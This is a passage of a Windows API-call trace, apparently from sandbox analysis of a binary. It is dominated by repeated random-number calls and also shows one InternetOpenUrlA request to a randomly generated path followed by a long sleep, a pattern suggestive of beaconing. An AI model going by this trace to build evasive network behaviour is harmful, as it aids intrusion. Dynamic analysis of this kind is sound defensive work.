lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0207.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0207.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0207.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26e, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a1b26e) returned 0x0 [0207.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.113] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.113] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.114] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.114] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.115] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.115] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.116] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.116] GetProcessHeap () returned 0x440000 [0207.116] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0207.116] lstrcpyA (in: lpString1=0x472f30, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0207.116] lstrcatA (in: lpString1="P²¡\x03", lpString2="/lXci76a0tdrun37w80lWBvveCFYp/yIfoeQpAtjth9quOrgu0i019uqns/" | out: lpString1="P²¡\x03/lXci76a0tdrun37w80lWBvveCFYp/yIfoeQpAtjth9quOrgu0i019uqns/") returned="P²¡\x03/lXci76a0tdrun37w80lWBvveCFYp/yIfoeQpAtjth9quOrgu0i019uqns/" [0207.116] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0207.117] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/lXci76a0tdrun37w80lWBvveCFYp/yIfoeQpAtjth9quOrgu0i019uqns/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0207.117] GetProcessHeap () returned 0x440000 [0207.117] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0207.117] GetProcessHeap () returned 0x440000 [0207.117] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0207.118] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0207.118] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0207.118] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.118] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0207.119] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0207.119] Sleep (dwMilliseconds=0x17a54) [0207.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0207.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0207.560] GetProcessHeap () returned 0x440000 [0207.560] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1a8b0 [0207.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0207.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1a8b1, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a1a8b1) returned 0x0 [0207.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.572] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.575] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.575] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.579] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.579] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0207.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.909] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.910] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.911] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.912] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.913] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0207.914] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1a8d8, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a1a8d8) returned 0x0 [0207.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.915] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.916] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.917] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.918] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.919] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0207.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.920] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.920] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.921] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0207.921] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.922] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0207.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0207.922] GetProcAddress (hModule=0x7ffc5bcc0000, 